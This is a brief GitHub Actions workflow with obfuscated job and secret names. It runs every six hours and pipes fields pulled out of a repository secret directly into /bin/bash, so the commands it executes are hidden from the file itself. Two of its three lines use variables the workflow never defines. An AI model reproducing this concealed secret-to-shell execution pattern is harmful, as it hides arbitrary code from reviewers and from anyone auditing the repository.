name: zhoubozou
on:
  workflow_dispatch:
  schedule:
    - cron: '35 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhoubozou
        env:
          clpxw943: ${{ secrets.clpxw943 }}
        run: |
          echo $clpxw943 | jq -r .so9447 | /bin/bash
          echo $gyhgn6 | jq -r .ddhk50480 | /bin/bash
          echo $wdal05 | jq -r .wkat35 | /bin/bash

